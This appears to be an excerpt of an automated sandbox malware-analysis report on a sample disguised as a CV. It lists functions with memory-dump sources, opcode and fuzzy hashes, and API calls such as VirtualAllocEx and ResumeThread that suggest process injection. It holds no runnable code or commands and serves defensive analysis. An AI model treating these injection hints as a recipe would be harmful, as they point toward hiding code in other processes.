                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: fba9d632d11fda8bc791452776af9afd1e54be234b74c6d37cd98822c84e0ebb
                                                                                                  • Instruction ID: 5a896a1de8a36487dbce885d5d3241ee3f0cfe1e45549d85d9b24cb511dd2616
                                                                                                  • Opcode Fuzzy Hash: fba9d632d11fda8bc791452776af9afd1e54be234b74c6d37cd98822c84e0ebb
                                                                                                  • Instruction Fuzzy Hash: FC1159768003499FDB14DFAAD8447EEBFF5EB88310F10881AE515A7240C779A944CBA4
                                                                                                  Function 019BA033 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 019BA0AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 134000473-0
                                                                                                  • Opcode ID: 244261fe43332f2b779ca6ee368cfe5acd1b987e6e89104f207ba3f02595578a
                                                                                                  • Instruction ID: 3efb445b673e8e5902b899017ba09dae711876905647fe2b04afcb8953172455
                                                                                                  • Opcode Fuzzy Hash: 244261fe43332f2b779ca6ee368cfe5acd1b987e6e89104f207ba3f02595578a
                                                                                                  • Instruction Fuzzy Hash: 452110B58012099FDB14CF9AC885BDEFBF8FB89210F14852ED419B7200C375A544CBA5
                                                                                                  Function 07888DA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07888E16
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 3a2de4b6915848b469caa42e89e90b042793c483448b276fd99fef1be8c92a01
                                                                                                  • Instruction ID: 9928ee401304b0816b59a303222e798b51a5daad7add77c659de048a910fd080
                                                                                                  • Opcode Fuzzy Hash: 3a2de4b6915848b469caa42e89e90b042793c483448b276fd99fef1be8c92a01
                                                                                                  • Instruction Fuzzy Hash: C81156768003499FDB10DFAAD844BDEBFF5EB88310F10881AE519A7240C779A944CBA4
                                                                                                  Function 05F26B58 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05F26BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFromIconResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668623891-0
                                                                                                  • Opcode ID: ed2fc2f3dc78c0dfb07eedfbb2f9c15ed9123755fa28f8a207151f01a026a2f5
                                                                                                  • Instruction ID: 848a49a960cbfe16b04f9de49c40e2dc318d8e34e5aed6bb708cb5b4817a635a
                                                                                                  • Opcode Fuzzy Hash: ed2fc2f3dc78c0dfb07eedfbb2f9c15ed9123755fa28f8a207151f01a026a2f5
                                                                                                  • Instruction Fuzzy Hash: E51119B6800359DFDB10CF9AD844BDEBFF8EB48310F14841AE554A7250C379A954DFA5
                                                                                                  Function 07888C18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: e8cc42595ca3466519bb24dbcc607a58d99b1fc3d3ed1ec1d0738180397f4a06
                                                                                                  • Instruction ID: def2c330e72ada80a48ee908db1cf8b38cf3ee01fe8bdbd4b0a16e0b15f0de8e
                                                                                                  • Opcode Fuzzy Hash: e8cc42595ca3466519bb24dbcc607a58d99b1fc3d3ed1ec1d0738180397f4a06
                                                                                                  • Instruction Fuzzy Hash: D9113DB1900389CFDB14DFAAD44479EFBF5EF88214F14885ED459A7240C778A945CB94
                                                                                                  Function 07888C20 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 03540e8e12dfa07b0394da6e4ad762e7c9d745e2fa3d66aa6c592ef8f6fe190f
                                                                                                  • Instruction ID: 0cc6a9b54139bd2ecb7cd7634ed3b7513cc4504532afc7eb88a56ffba83c8c97
                                                                                                  • Opcode Fuzzy Hash: 03540e8e12dfa07b0394da6e4ad762e7c9d745e2fa3d66aa6c592ef8f6fe190f
                                                                                                  • Instruction Fuzzy Hash: 61113AB19003498FDB14DFAAD44479EFBF9EB88224F24881AC559A7240C778A944CBA4
                                                                                                  Function 019BB6B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 019BB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: a4200684aba90e2d3bbc1e696201b5de1561157dbb05387f39c63c2b16d91d3d
                                                                                                  • Instruction ID: f89bfc8d110f3de864c1354313fe85d511dd3bf762d1ad85e132f859fd8e4729
                                                                                                  • Opcode Fuzzy Hash: a4200684aba90e2d3bbc1e696201b5de1561157dbb05387f39c63c2b16d91d3d
                                                                                                  • Instruction Fuzzy Hash: 0B11E0B6C003498FDB14CF9AD484BDEFBF9EB88324F24841AD469A7640C375A545CFA5
                                                                                                  Function 078878C0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: 72a44fe4e2724d54567dcf7ce11971731ae1ad47ff227ee4f1d108f6b02ce356
                                                                                                  • Instruction ID: cb4a044b34db7b862a02554e7d20b4d5d0a9d0eaa8d655ca4888516499f579b9
                                                                                                  • Opcode Fuzzy Hash: 72a44fe4e2724d54567dcf7ce11971731ae1ad47ff227ee4f1d108f6b02ce356
                                                                                                  • Instruction Fuzzy Hash: 0011D6B5800349DFDB10DF9AD485BDEBFF8EB58314F10841AE958A7600D375A944CFA5
                                                                                                  Function 0788B36A Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0788B3CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePost
                                                                                                  • String ID:
                                                                                                  • API String ID: 410705778-0
                                                                                                  • Opcode ID: b4ad1ac8604dc78fd485a47120d58939909543124ad50349bf675d2eadc9bd59
                                                                                                  • Instruction ID: 6c4b12bcf6f01ff035ae8718dae811d4e5790b37262cd953524c4a47c42ac996
                                                                                                  • Opcode Fuzzy Hash: b4ad1ac8604dc78fd485a47120d58939909543124ad50349bf675d2eadc9bd59
                                                                                                  • Instruction Fuzzy Hash: C81106B58003499FDB10DF9AD485BDEBFF8EB48314F10841AE458A7600C374A944CFA5
                                                                                                  Function 014DD1FC Relevance: .1, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28275946578.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14dd000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 03c7f4e0f8168836d38a768e7f5e7badf7b79e34f2a96e74a53635a6702433c6
                                                                                                  • Instruction ID: 44c3ecdbf034a8e19dcfeaf78740b5333a4bb9fbb19d4f0e77075810860d1ed1
                                                                                                  • Opcode Fuzzy Hash: 03c7f4e0f8168836d38a768e7f5e7badf7b79e34f2a96e74a53635a6702433c6
                                                                                                  • Instruction Fuzzy Hash: E421D672904340DFDF05DF94D8D4B27BF65FB88320F24856AE8050B296C336D416CBA2
                                                                                                  Function 014ED01C Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276010560.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14ed000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a056a2f9548fe0120013673b44e36493a338efffd9b08884c9611689dfa845e
                                                                                                  • Instruction ID: 7969626cd6c7691f345c4cb39a74a0ef9acf2ec554bb8ac20350af2ae262c1e0
                                                                                                  • Opcode Fuzzy Hash: 9a056a2f9548fe0120013673b44e36493a338efffd9b08884c9611689dfa845e
                                                                                                  • Instruction Fuzzy Hash: 6921D3B1904340DFDB15DF54D888B16BFA5FB84319F28C56EE84A4B366C336D847CA62
                                                                                                  Function 014ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276010560.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14ed000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 66a06a9747f0cacb4b11f8883483380e732ff363cd39092387f7293fd9bf3cf1
                                                                                                  • Instruction ID: acf4d06b22f2a8bf0ed2efaf8e81ed828ab68ae1433130325c3d06b521d1e1f9
                                                                                                  • Opcode Fuzzy Hash: 66a06a9747f0cacb4b11f8883483380e732ff363cd39092387f7293fd9bf3cf1
                                                                                                  • Instruction Fuzzy Hash: 01210775904340EFEB05DF94D9C8B16BBA5FB84325F20C56EE8494B3A2C336D846CA62
                                                                                                  Function 014ED006 Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276010560.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14ed000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35902b2169e9215198b985ca0091932965db47ac871b8c6d1cf055b96c67cdb0
                                                                                                  • Instruction ID: a76864bfc634c66973505c9160db66cfcf65c9bf32caaa323bdbcb04afb982e8
                                                                                                  • Opcode Fuzzy Hash: 35902b2169e9215198b985ca0091932965db47ac871b8c6d1cf055b96c67cdb0
                                                                                                  • Instruction Fuzzy Hash: 0F2180755093808FDB02CF24D994716BFB1EF46214F28C5DBD8498B2A7C33A980ACB62
                                                                                                  Function 014DD1F7 Relevance: .1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28275946578.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14dd000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41c92a5f04c80113fe2ffc77ea0e349cc6b95ea471f243b0f776fff4552aa1ca
                                                                                                  • Instruction ID: 7a32f0ae757fe6fd310241c0e598bd7cc7bd4cc31f9a519c5c4d57970516585a
                                                                                                  • Opcode Fuzzy Hash: 41c92a5f04c80113fe2ffc77ea0e349cc6b95ea471f243b0f776fff4552aa1ca
                                                                                                  • Instruction Fuzzy Hash: B9219076904280DFDF06CF54D9C4B16BF71FB84320F2485AADC090A696C336D456CB91
                                                                                                  Function 014ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276010560.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14ed000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3bf8f075f660d12c8119e9a405ea18cce85e4a2faeca73717d33f511e8833ea
                                                                                                  • Instruction ID: cec425d6ece9891589f907f4f39aee389e2b86501e7ca6952e85562725f35275
                                                                                                  • Opcode Fuzzy Hash: d3bf8f075f660d12c8119e9a405ea18cce85e4a2faeca73717d33f511e8833ea
                                                                                                  • Instruction Fuzzy Hash: 45118B75904280DFDB16CF54D5C8B16BFA1FB84224F24C6AAD8494B7A6C33AD44ACB61
                                                                                                  Function 014DD745 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28275946578.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14dd000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20d878afa9242c5a6a53a029272cfcfa265ee02a746d97ee6565e3069d29ce48
                                                                                                  • Instruction ID: f31e661cce03abc4c0aa217e1868ebf3a89b420653d6bce8d1c882d6f8fc527f
                                                                                                  • Opcode Fuzzy Hash: 20d878afa9242c5a6a53a029272cfcfa265ee02a746d97ee6565e3069d29ce48
                                                                                                  • Instruction Fuzzy Hash: EE01F7328043C09FFF149A65CC98B27FF9CDF41220F14859BED480A2D2D2799841CAB5
                                                                                                  Function 014DD744 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28275946578.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_14dd000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89838a7af95e8713c2eda8cb974c8f6550f15602c408d58ebe54e6a12ea69ad2
                                                                                                  • Instruction ID: c5f8634bf6d749d659b4a83c8df2d8c8e61c255d9b03a80e25a01c8a2b42a414
                                                                                                  • Opcode Fuzzy Hash: 89838a7af95e8713c2eda8cb974c8f6550f15602c408d58ebe54e6a12ea69ad2
                                                                                                  • Instruction Fuzzy Hash: B5F06276404384AEFB149E5AC8C8B63FF98EB91634F18C45BED485A296C2799844CAB1

                                                                                                  Non-executed Functions

                                                                                                  Function 078864E0 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6bdd824753cc4eb1875b80040bd027f6be955f38dcc63b74069bbabd13c63bd8
                                                                                                  • Instruction ID: 08c0a652d1f9d11d22c7dfb28f7a0de7c92681659ef1e186028620b3d85f90c9
                                                                                                  • Opcode Fuzzy Hash: 6bdd824753cc4eb1875b80040bd027f6be955f38dcc63b74069bbabd13c63bd8
                                                                                                  • Instruction Fuzzy Hash: 42E1F9B4E102198FDB14DFA9C580AAEFBF2FF89304F248169D415AB356D730A941CFA1
                                                                                                  Function 078883F8 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 69ccd50a4a56183ef0c08c5f4607e5ee80dc3df78fb067a4e29ff0e10d43ae30
                                                                                                  • Instruction ID: aebbaf484e3480d20fc68f1ac368cc0c9b8b56314e34dc3dd064d2ab1ae63e0a
                                                                                                  • Opcode Fuzzy Hash: 69ccd50a4a56183ef0c08c5f4607e5ee80dc3df78fb067a4e29ff0e10d43ae30
                                                                                                  • Instruction Fuzzy Hash: B7E1E9B4E102198FDB54DFA9C580AAEFBB2FF89304F24816AD415A7355DB30AD41CFA1
                                                                                                  Function 078860A8 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7a60d76c5d14fedeb7a4ba470d69fccace4ba98755416f3ff62393d6ccc378e
                                                                                                  • Instruction ID: 0d4934c4f54fe4053538eec6999dff6abd3c28213034f33c2b632621193ec65c
                                                                                                  • Opcode Fuzzy Hash: f7a60d76c5d14fedeb7a4ba470d69fccace4ba98755416f3ff62393d6ccc378e
                                                                                                  • Instruction Fuzzy Hash: EAE1F9B4E002198FDB54DFA9C580AAEFBB2FF89304F248169D515AB356D730AD41CFA1
                                                                                                  Function 07886D50 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bb54e219a6762598f53c378bc920cbccdf7ffb7f4f424258271da37259bf791
                                                                                                  • Instruction ID: 40da4bfbca3d8def9f5d4d161102c28f3cac430e27ae1b9e4fea009c1417bd6c
                                                                                                  • Opcode Fuzzy Hash: 5bb54e219a6762598f53c378bc920cbccdf7ffb7f4f424258271da37259bf791
                                                                                                  • Instruction Fuzzy Hash: 5BE10AB4E002198FDB54DFA9C580AAEFBB2FF89304F24816AD515AB356D731AD41CF60
                                                                                                  Function 07886918 Relevance: .3, Instructions: 312COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d16bfd426561296363714091bb76373ada3eb25035d88a489269ad63e8f2233d
                                                                                                  • Instruction ID: 21088326b3c1e554e369e15145894f97e66bfa251fb6d889c25f9610d8028046
                                                                                                  • Opcode Fuzzy Hash: d16bfd426561296363714091bb76373ada3eb25035d88a489269ad63e8f2233d
                                                                                                  • Instruction Fuzzy Hash: EFE10AB4E102198FDB14DFA9C580AAEFBB2FF89304F248169D515AB356D731AD41CFA0
                                                                                                  Function 019BE2A4 Relevance: .3, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28276671877.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_19b0000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 240fe506634ba632437ef932fad6e7b3d953b4bceda18cf8e863f3d33619e622
                                                                                                  • Instruction ID: 1e05391ed270bf780644ab319db1373600ec6433142e3bd5f30e15591e212f20
                                                                                                  • Opcode Fuzzy Hash: 240fe506634ba632437ef932fad6e7b3d953b4bceda18cf8e863f3d33619e622
                                                                                                  • Instruction Fuzzy Hash: 88A17232E002158FCF09DFB4D9845DEBBB6FFC4301B15456AE90AAB265DB31E915CB40
                                                                                                  Function 078818C8 Relevance: .2, Instructions: 222COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ed6450443d3a0a5c7851a7d69f0fa54def26ac0bab5ee129443964f39b8329b3
                                                                                                  • Instruction ID: 8f7511deb29ebf2bb4fb5cfaa882d464a766135a288f4e008694240d612f424f
                                                                                                  • Opcode Fuzzy Hash: ed6450443d3a0a5c7851a7d69f0fa54def26ac0bab5ee129443964f39b8329b3
                                                                                                  • Instruction Fuzzy Hash: 1671169280E3E55FE35B6A7898A83D53F708F53125F0A01DBC094CE1A3DA5C894AC36B
                                                                                                  Function 078864D1 Relevance: .1, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ef5b98011e743fa6df92b964b2bcd0a10572b255b82423f1b66051c920353297
                                                                                                  • Instruction ID: 097a8b1f7c2e01f84b8938f65d8fb7c04383e4b23cab233e5c98e6c1b1cf6285
                                                                                                  • Opcode Fuzzy Hash: ef5b98011e743fa6df92b964b2bcd0a10572b255b82423f1b66051c920353297
                                                                                                  • Instruction Fuzzy Hash: FC5130B4E002598FDB14DFA9C540AAEFBF2FF89304F24826AD418AB356D7355941CF61
                                                                                                  Function 07886D41 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281743634.0000000007880000.00000040.00000800.00020000.00000000.sdmp, Offset: 07880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7880000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14142171a06f1aef9eba199632251515b79f1b67f29f11ee20c681278055c725
                                                                                                  • Instruction ID: f852b4f6902ed678895cc916cb4629be2e66ebfd106f96637a956c77a2c1c580
                                                                                                  • Opcode Fuzzy Hash: 14142171a06f1aef9eba199632251515b79f1b67f29f11ee20c681278055c725
                                                                                                  • Instruction Fuzzy Hash: DB512CB0E002198FDB14DFA9C5846AEFBF2FF89304F24816AD418A7316DB319941CFA0
                                                                                                  Function 05F2BF87 Relevance: .1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.28281306470.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5f20000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7e0167ba3a730e9e2645047115436f8bcbc1df977a802b359ac794be48576a61
                                                                                                  • Instruction ID: 359b8a776f879154ef292af4f82020f4a5c7195b90a94bc2ba6c0cfbb9520b84
                                                                                                  • Opcode Fuzzy Hash: 7e0167ba3a730e9e2645047115436f8bcbc1df977a802b359ac794be48576a61
                                                                                                  • Instruction Fuzzy Hash: F7419BB1E016289BEB18CF6ACD4079EFAF3AFC9300F14C5A9D509A7254EB3459858F51

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:5.1%
                                                                                                  Signature Coverage:8%
                                                                                                  Total number of Nodes:137
                                                                                                  Total number of Limit Nodes:9
